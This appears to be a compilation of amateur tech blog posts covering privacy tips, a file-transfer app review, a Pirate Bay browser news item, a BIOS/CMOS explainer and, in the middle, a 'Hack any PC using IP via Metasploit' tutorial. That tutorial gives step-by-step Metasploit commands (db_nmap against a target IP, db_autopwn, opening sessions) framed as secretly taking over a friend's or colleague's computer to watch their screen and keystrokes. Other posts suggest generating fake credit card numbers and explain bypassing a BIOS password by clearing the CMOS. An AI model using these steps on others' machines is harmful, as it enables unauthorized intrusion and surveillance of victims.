How To Stay Safe&Secure While Serving The Web

When you first enter to the connected world of the internet try to imagine a place where there is so many Apps and Services don't even cost a penny; games, social networks, videos, music, and pictures it’s almost like virtual paradise, but looking under Neath that wonderland there is a far greater told being collected-your identity- names, locations, addresses, family and friendship connections, likes, searches, browsing history.

Basically the more the internet you use the more information you give corporations so they can turn around and sell your identity to the heights bitter.

So here a great question comes into the mind, is there a way to be a part of  this online economy without sacrificing your identity and  privacy? YES you can lie!
Here is the four major ways online companies collect your data and four major ways you can hide your data from them.

First is Location: By using your computers ip-address fine online services can determine where you connecting to the internet from, a good practice are to hide your ip using a Proxy or what is called Virtual Private Network (VPN). And there is a plenty of plugins for your specific browser type that allow you to do both i.e.  Switchy and FoxyProxy, there is also free services out there such as CyberGhost that allow you to serve web while hiding your ip-address, you can also build your own VPN  service using computers in different locations, or you  can pay premium vpn services like [witopia], which make it look like you are from a different  country all together.

Second is site tracking and browsing history: when you visit certain websites they collect data on you even if you aren't aware of it, i have already mentioned your ip-address but also your browser type and your Operating System, what pages you’ve visited and what you clicked on. Depending on your browser again you can use third party plugins like [DNT+] that can block these websites from collecting information on you, or you can use harder security browser systems such as Tor and SRWare Iron which is like chrome.
Normally if you want to use an online service you've to sign up using personal information but it doesn't necessarily have to be your personal information that is where the Third step comes into play.

Third Fake Identities: if you go to fakenamegenerator.com you can generate intire fake identities that you can use to fill out forms, another good one is datafakegenerator.com that even let you generate fake Credit Card number. Fourth step concerns the most important part of information your email address.

Fourth Disposable Emails: This is quite tricky because most online services require a valid email before you can complete the registration process. So you need a fake anonymous email that you can actually check, the best options that can allow this, is the disposable email services such as 10minutemail, guerrillamail or mailnesia for a longer lasting fake email address.

Final note: Although it’s not 100% anonymity these tips will at least give you 90% to the way there.

Pipe App! A Direct and Secure File Transfer

Pipe App. is a file transfer web application based on Adobe Flash with peer-to-peer functionality at its core, and most importantly there is no software to be installed on the user’s computers both the sender and the receiver because Pipe is a web application with the capability of running on Facebook’s app platform.

Also because Pipe relies on Facebook for user authentication and matching, the user is certainly addressed which makes the transaction process safe and secure. To get the full functionality of Pipe you don’t need to install any extra software on your computer, and neither do your friends. Just open the Pipe app on Facebook and you have immediate access to all of your friends. The Pipe app creates a direct connection between you and an online friend. Files do not and won’t pass through Facebook as the file is transferred directly from your computer to your friend’s computer.
Pipe has a tree hilarious file transmission types formally named asGreen Pipe, Blue Pipe and Grey Pipe

Green Pipe: it’s the kind of transmission you must use whenever your friend is online on the Pipe app, and it’s really simple and goes this way: if you drop the file in a green Pipe, your friend must be online on Pipe and ready to receive a file up to 1GB.
Blue Pipe: briefly blue pipe is the transfer you made when your friend is online on Facebook, but not on Pipe App itself. Just send a file and drop it on the blue pipe and your friend will be notified by getting an invite from you.
Grey Pipe: it’s the type of transaction you make when your friend is not completely available simply means when your friend is offline on both Pipe and Facebook, on that occasion still you can send a file to a locker for your friend to pick it up later.
So from this point of view we know that we can always make a file transfer no matter whether our friends and colleagues are available or not.

How it works

Pipe is a file transfer application that transfers files up to 1GB directly from one computer to another computer using peer-to-peer mechanism. To do this, Pipe uses the transfer protocol called RTMFP (Real Time Media Flow Protocol) from Adobe, which is based on UDP. RTMFP has a 128bit AES encryption for the communication channels between the sender and receiver’s computers which gives us the complete trust and on it. An in simple words this means files do not pass through Pipe or Facebook, as the file is transferred via a secure connection directly from your computer to your friend’s computer, or via a locker in other words, neither Pipe nor Facebook sees the files.

What is Pipe Locker

In case where the intended recipient is either offline, busy or unavailable the user can choose for the file to be uploaded to Pipe’s cloud-based storage called ‘locker’ via an HTTPS encrypted connection. Each locker can contain a file up to 100MB.

Facebook Integration

To establish the Pipe connection between friends whilst respecting the user’s privacy, Pipe uses only the anonymous 3rd party ID provided by Facebook. Pipe does not use real names or Facebook IDs for enabling the transfer of file.

Browser Compatibility

Pipe uses the very latest browser and Adobe Flash features and for this reason works best with Google Chrome and Comodo Dragon. Some Pipe features might not be supported by older browsers like IE6,8,9 I therefore recommend that users keep their browser up to date, and preferably use Google Chrome or Comodo Dragon.

Relay On Pipe

Even when users find themselves behind unusual network configurations or symmentic NAT’s, a file can still be transferred with pipe. In this case, the Pipe relay service forwards it between the two computers, but without ever storing the file. So it’s totally clear and understandable what Pipe App provides as a service is really reliable so go and get it. And believe me it has the potential to be a true game changer.

Hack any PC using IP via Metasploit

Usually whenever you are thinking to do some stuff with your friend's computer or maybe your colleague’s laptop without a physical contact with his/her things that may seem a little bit impossible.
But with the help of the Metasploit feature you can even fully control his entire network or computer by just having his/her computer’s IP address and a few steps which I will shortly guide you through.

It's really important and highly recommended to have a basic knowledge about coding specially on CMD and Linux environments like Red Hat Linux or the other available distros. Well for this moment I will consider that you have the recommended skills to do the real hacking, just follow  me up.

1    1.)    First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database.
Download here:http://www.postgresql.org/
Make sure you use all the defaults or Metasploit won't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit GUI.

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't worry, this is normal.

6.) Type db_host to make sure you are connected correctly.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
Watch the auto-exploitation start, go play Halo for a while, and then come back...

9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

Sessions -i ExploitNumber

The features of Metasploit are much like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.

Pirate Bay Releases ‘Pirate Browser’ to Thwart Censorship

The Pirate Bay is taking a stand against the increased censorship efforts it faces in several European countries. On its 10th anniversary the infamous BitTorrent site is releasing its “Pirate Browser,” a fully functional web browser that allows people to access The Pirate Bay and other blocked sites just fine. The current release is Windows only but TorrentFreak is informed that Mac and Linux versions will follow soon. The Pirate Bay is arguably the most censored websites on the Internet. Courts in the UK, the Netherlands, Italy and elsewhere have ordered Internet providers to block subscriber access to the torrent site, and more are expected to follow.

Up until now The Pirate Bay has encouraged users affected by the blackout to use proxy sites. However, on its 10th anniversary they are now releasing a special “PirateBrowser” which effectively bypasses any ISP blockade.

“It’s a simple one-click browser that circumvents censorship and blockades and makes the site instantly available and accessible. No bundled adware, toolbars or other crap, just a Pre-configured Firefox browser,” The Pirate Bay explains.

The browser is based on Firefox 23 bundled with a Tor client and some proxy configurations to speed up loading. It is meant purely as a tool to circumvent censorship and unlike the Tor browser it doesn't provide any anonymity for its users.

“This browser is just to circumvent censorship, to remove limits on accessing sites governments don’t want you to know about,” The Pirate Bay notes.

PirateBrowser works like any other web browser and comes pre-loaded with several bookmarks for blocked sites, which aside from The Pirate Bay includes EZTV, KickassTorrents, Bitsnoop and H33T.

The browser also lists the alternative .Onion addresses for both TPB and EZTV as backups to access these sites.

The Pirate Bay is not alone in its efforts to keep the Internet open and accessible. The Obama administration has spent millions of dollars on similar projects allowing citizens of oppressed regimes to access blocked websites, albeit for different reasons.

The Pirate Bay team informs TorrentFreak that “PirateBrowser” is just the first step in their efforts to fight web censorship. They are also working on a special BitTorrent-powered browser, which lets users store and distribute The Pirate Bay and other websites on their own.

In theory, this will allow sites to exist and update even without having a public facing website. As a result, it will be virtually impossible to block or shut them down. The first version of this new software is currently being tested but there is currently no firm launch date. More on that later.

In the meantime, the development of PirateBrowser will also continue. The current release is only available for the Windows platform but Mac and Linux versions will follow in the future.

Know More About BIOS's!

Whats is BIOS?
BIOS Stands for Basic Input Output System. The BIOS is the first thing you see when you turn on your computer. The function of the BIOS is to connect other Other chips, Hard Drives, Ports, CD Rom, CPU etc. and make sure they all work together. 
When you turn on your computer, The first thing the BIOS does it to check for the CMOS settings and after evaluating the CMOS, It loads the Operating system. and there are many more things that the BIOS does. I can't explain all of it here. Talking about BIOS, you already know that there are 2 types softwares.

1. Operating System ( OS ).
The Operating System is the main software which runs on a computer system. It manages all other activities and processes in the computer.

2. Applications.
Firefox, Google Chrome, Opera, Safari, Internet Explorer, I bet you might be already using one of these applications. Well, The BIOS is some what classified as the third type of Software.

What is CMOS?
CMOS stands for Complementary Metal Oxide Semi Conductor.
CMOS is an on-board semiconductor chip powered by a CMOS battery inside computers that stores information such as the system time and date and the system hardware settings for your computer. This also where the BIOS Password is stored.

If you have already read the above BIOS and CMOS definition links you should now know that the BIOS and CMOS are two different components on the motherboard. The BIOS on the motherboard contains the instructions on how the computer boots and is only modified or updated with BIOS updates, the CMOS is powered by a CMOS battery and contains your system settings and is modified and changed by entering the CMOS Setup.

BIOS Password.
Setting up the BIOS Password secures your computer. It prevents from booting of other disks in order to access your hard disk data. After you set BIOS Password, when the computer is started it asks for the password, unless you get the correct password all the parts like Cd-Rom, USB Ports, Hard Disks, etc becomes useless. So the BIOS Password secures your computer pretty good.
But fortunately if you has a physical access to a BIOS Password enables computer, you can reset it.

You already know that the BIOS password is stored in the CMOS which is powered by a small watch sized battery inside the computer on the motherboard. If we want to reset the BIOS password, we have to reach upto the CMOS battery on the mother board. The battery holds small amount of information which can be erased by short circuiting the CMOS using a jumper. ( the jumper is just a metal conductor ). Or you can remove the Battery and keep it for a while until all the data in the CMOS is erased. Some of the computers comes with an Jumper already in it. To reset the CMOS, just place the jumper in the opposite position from the way it was. Keep it like that for some time and put it back in the original position.

Since Different computers have different kinds of CMOS and BIOS it is not an easy task to tell how to exactly reset the CMOS data in step by step. How ever, here is a videos showing how to short circuit the CMOS using a jumper.
